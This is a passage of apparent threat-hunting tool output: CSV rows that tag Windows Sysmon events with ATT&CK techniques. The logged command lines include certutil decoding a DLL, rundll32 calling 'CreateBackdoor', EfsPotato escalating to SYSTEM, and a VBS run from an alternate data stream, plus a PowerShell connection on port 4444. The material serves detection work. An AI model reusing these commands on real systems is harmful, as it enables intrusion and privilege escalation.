cmd /c certutil -f -decode fi.b64 AllTheThings.dll
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil -f -decode fi.b64 AllTheThings.dll ),1,"
1
5
4
1
0
0x8000000000000000
4890
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:32:58.940
747F3D96-660A-5D3F-0000-0010FFF28500
700
C:\Windows\System32\certutil.exe
10.0.17763.1 (WinBuild.160101.0800)
CertUtil.exe
Microsoft® Windows® Operating System
Microsoft Corporation
certutil -f -decode fi.b64 AllTheThings.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
747F3D96-660A-5D3F-0000-0010B9E08500
3184
C:\Windows\System32\cmd.exe
cmd /c certutil -f -decode fi.b64 AllTheThings.dll
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
1
5
4
1
0
0x8000000000000000
243512
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:17.504
747F3D96-9F61-5E75-0000-0010686A1E00
4848
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564834100.731416,2019-08-03T16:08:20.731416+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
5447
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-03 12:08:19.888
747F3D96-7933-5D45-0000-0010227E0701
6000
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-D4E9-5D45-0000-0020E7030000
0x3e7
1
System
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-7930-5D45-0000-001055DE0601
4740
C:\Windows\System32\consent.exe
consent.exe 896 318 0000028064471300
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243512
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:17.504
747F3D96-9F61-5E75-0000-0010686A1E00
4848
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243512
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:17.504
747F3D96-9F61-5E75-0000-0010686A1E00
4848
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1557801168.359432,2019-05-14T06:32:48.359432+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( "C:\Windows\system32\whoami.exe" /groups) ,1,"
1
5
4
1
0
0x8000000000000000
17717
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-14 02:32:48.342
365ABB72-28D0-5CDA-0000-0010F76F1300
3964
C:\Windows\System32\whoami.exe
6.1.7600.16385 (win7_rtm.090713-1255)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\whoami.exe" /groups
C:\temp\PowerShell-Suite-master\
IEWIN7\IEUser
365ABB72-26E1-5CDA-0000-002087350100
0x13587
1
Medium
SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
365ABB72-28A0-5CDA-0000-001074181300
2016
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1557801168.359432,2019-05-14T06:32:48.359432+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /groups ) contains a suspicious command ( whoami.exe),1,"
1
5
4
1
0
0x8000000000000000
17717
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-14 02:32:48.342
365ABB72-28D0-5CDA-0000-0010F76F1300
3964
C:\Windows\System32\whoami.exe
6.1.7600.16385 (win7_rtm.090713-1255)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\whoami.exe" /groups
C:\temp\PowerShell-Suite-master\
IEWIN7\IEUser
365ABB72-26E1-5CDA-0000-002087350100
0x13587
1
Medium
SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
365ABB72-28A0-5CDA-0000-001074181300
2016
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami /priv) ,1,"
1
5
4
1
0
0x8000000000000000
15678
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-10 13:33:29.409
365ABB72-7DA9-5CD5-0000-00100ED31400
2524
C:\Windows\System32\whoami.exe
6.1.7600.16385 (win7_rtm.090713-1255)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
whoami /priv
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-79DF-5CD5-0000-0020F8410100
0x141f8
1
High
SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
365ABB72-7D86-5CD5-0000-0010CC2E1400
2076
C:\Windows\System32\cmd.exe
"c:\Windows\System32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1629660818.905645,2021-08-22T23:33:38.905645+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"
1
5
4
1
0
0x8000000000000000
1912935
Microsoft-Windows-Sysmon/Operational
LAPTOP-JU4M3I0E
2021-08-22 19:33:38.890
00247C92-A692-6122-0000-0010A5CD1F02
11328
C:\Windows\System32\whoami.exe
10.0.19041.1 (WinBuild.160101.0800)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
whoami.exe
whoami
C:\WINDOWS\system32\
NT AUTHORITY\SYSTEM
00247C92-7087-6122-0000-0020E7030000
0x3e7
0
System
SHA1=1915FBFDB73FDD200C47880247ACDDE5442431A9,MD5=A4A6924F3EAF97981323703D38FD99C4,SHA256=1D4902A04D99E8CCBFE7085E63155955FEE397449D386453F6C452AE407B8743,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
00247C92-A691-6122-0000-001021C31F02
14048
C:\temp\EfsPotato.exe
c:\temp\EfsPotato.exe whoami
",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435978.711831,2019-07-30T01:32:58.711831+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c certutil -f -decode fi.b64 AllTheThings.dll ),1,"
1
5
4
1
0
0x8000000000000000
4888
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:32:58.614
747F3D96-660A-5D3F-0000-0010B9E08500
3184
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c certutil -f -decode fi.b64 AllTheThings.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557495209.424885,2019-05-10T17:33:29.424885+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\Windows\System32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
15677
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-10 13:32:54.034
365ABB72-7D86-5CD5-0000-0010CC2E1400
2076
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"c:\Windows\System32\cmd.exe"
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-79DF-5CD5-0000-0020F8410100
0x141f8
1
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-7D85-5CD5-0000-001047061400
2536
C:\Windows\System32\CompMgmtLauncher.exe
"C:\Windows\System32\CompMgmtLauncher.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1561018078.816185,2019-06-20T12:07:58.816185+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"
1
5
4
1
0
0x8000000000000000
8119
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-06-20 08:07:52.956
365ABB72-3ED8-5D0B-0000-0010398F1A00
1476
C:\Windows\System32\whoami.exe
6.1.7600.16385 (win7_rtm.090713-1255)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
whoami
c:\ProgramData\
IEWIN7\IEUser
365ABB72-3991-5D0B-0000-002029350100
0x13529
1
High
SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
365ABB72-3ED4-5D0B-0000-0010B2871A00
1440
C:\Windows\System32\cmd.exe
"cmd"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1557801168.290682,2019-05-14T06:32:48.290682+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( "C:\Windows\system32\whoami.exe" /groups) ,1,"
1
5
4
1
0
0x8000000000000000
17715
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-14 02:32:48.290
365ABB72-28D0-5CDA-0000-00103A6B1300
2676
C:\Windows\System32\whoami.exe
6.1.7600.16385 (win7_rtm.090713-1255)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\whoami.exe" /groups
C:\temp\PowerShell-Suite-master\
IEWIN7\IEUser
365ABB72-26E1-5CDA-0000-002087350100
0x13587
1
Medium
SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
365ABB72-28A0-5CDA-0000-001074181300
2016
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1557801168.290682,2019-05-14T06:32:48.290682+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /groups ) contains a suspicious command ( whoami.exe),1,"
1
5
4
1
0
0x8000000000000000
17715
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-14 02:32:48.290
365ABB72-28D0-5CDA-0000-00103A6B1300
2676
C:\Windows\System32\whoami.exe
6.1.7600.16385 (win7_rtm.090713-1255)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\whoami.exe" /groups
C:\temp\PowerShell-Suite-master\
IEWIN7\IEUser
365ABB72-26E1-5CDA-0000-002087350100
0x13587
1
Medium
SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
365ABB72-28A0-5CDA-0000-001074181300
2016
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435978.659405,2019-07-30T01:32:58.659405+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ),1,"
1
5
4
1
0
0x8000000000000000
4887
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:32:57.600
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6056-5D3F-0000-0010C9EF4100
4600
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"
1
5
4
1
0
0x8000000000000000
342417
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-08-12 13:06:08.141
747F3D96-E940-5F33-0000-001039310F00
7460
C:\Windows\System32\whoami.exe
10.0.17763.1 (WinBuild.160101.0800)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
whoami.exe
whoami
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-E909-5F33-0000-0020E7030000
0x3e7
0
System
SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
747F3D96-E93C-5F33-0000-0010A6F00E00
8032
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1561018072.95681,2019-06-20T12:07:52.956810+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.13 ) to hostname ( ) , IP ( 10.0.2.18 ) and port ( 38208 )",3,"
3
5
4
3
0
0x8000000000000000
8118
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-06-20 08:07:48.721
365ABB72-3D05-5D0B-0000-001004220D00
816
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
IEWIN7\IEUser
tcp
false
false
10.0.2.13
IEWIN7
4444
false
10.0.2.18
38208
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1590282859.005259,2020-05-24T05:14:19.005259+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"
1
5
4
1
0
0x8000000000000000
196375
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-05-24 01:13:54.117
747F3D96-CA52-5EC9-0000-001027FA3700
4456
C:\Windows\System32\whoami.exe
10.0.17763.1 (WinBuild.160101.0800)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
whoami.exe
whoami
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-BDD1-5EC9-0000-0020E7030000
0x3e7
1
System
SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
747F3D96-CA4E-5EC9-0000-00109FE23700
1516
C:\Windows\System32\cmd.exe
c:\Windows\System32\cmd.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564903596.239723,2019-08-04T11:26:36.239723+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
5637
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-04 07:26:35.116
747F3D96-88AB-5D46-0000-001081ED7D03
4300
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-56A3-5D45-0000-0020B3D31800
0x18d3b3
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-88AA-5D46-0000-001093E37D03
4644
C:\Windows\System32\dllhost.exe
C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( "C:\Windows\system32\whoami.exe") ,1,"
1
5
4
1
0
0x8000000000000000
110435
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-05-02 18:01:57.417
747F3D96-B595-5EAD-0000-00106BFDC200
6004
C:\Windows\System32\whoami.exe
10.0.17763.1 (WinBuild.160101.0800)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
whoami.exe
"C:\Windows\system32\whoami.exe"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-6ABB-5EAD-0000-0020E7030000
0x3e7
0
System
SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
747F3D96-B592-5EAD-0000-0010D4CDC200
1428
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,User Name : ( NT AUTHORITY\SYSTEM ) with Command Line : ( "C:\Windows\system32\whoami.exe" ) contains a suspicious command ( whoami.exe),1,"
1
5
4
1
0
0x8000000000000000
110435
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-05-02 18:01:57.417
747F3D96-B595-5EAD-0000-00106BFDC200
6004
C:\Windows\System32\whoami.exe
10.0.17763.1 (WinBuild.160101.0800)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
whoami.exe
"C:\Windows\system32\whoami.exe"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-6ABB-5EAD-0000-0020E7030000
0x3e7
0
System
SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
747F3D96-B592-5EAD-0000-0010D4CDC200
1428
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
342416
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-08-12 13:06:04.074
747F3D96-E93C-5F33-0000-0010A6F00E00
8032
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-E909-5F33-0000-0020E7030000
0x3e7
0
System
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-E93B-5F33-0000-001003BA0E00
7920
C:\Windows\System32\wermgr.exe
C:\Windows\system32\wermgr.exe -upload
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /name Microsoft.BackupAndRestoreCenter ),1,"
1
5
4
1
0
0x8000000000000000
11267
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-09 03:25:24.677
365ABB72-9DA4-5CD3-0000-00107F7A2F00
2920
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\cmd.exe" /name Microsoft.BackupAndRestoreCenter
C:\Users\IEUser\AppData\Local\Temp\onedrive\
IEWIN7\IEUser
365ABB72-94CD-5CD3-0000-0020DD3A0100
0x13add
1
Medium
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-9DA4-5CD3-0000-00102E692F00
3184
C:\Windows\System32\sdclt.exe
"C:\Windows\system32\sdclt.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557370343.531513,2019-05-09T06:52:23.531513+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /C "C:\Windows\wscript.exe "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" ),1,"
1
5
4
1
0
0x8000000000000000
11242
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-09 02:52:23.515
365ABB72-95E7-5CD3-0000-001004970F00
3784
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /C "C:\Windows\wscript.exe "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs""
C:\Users\IEUser\AppData\Local\Temp\onedrive\
IEWIN7\IEUser
365ABB72-94CD-5CD3-0000-0020DD3A0100
0x13add
1
Medium
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-9570-5CD3-0000-00103FC90A00
1900
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436045.252684,2019-07-30T01:34:05.252684+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32 AllTheThings.dll,EntryPoint )",1,"
1
5
4
1
0
0x8000000000000000
4965
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:05.213
747F3D96-664D-5D3F-0000-0010F1498C00
6836
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
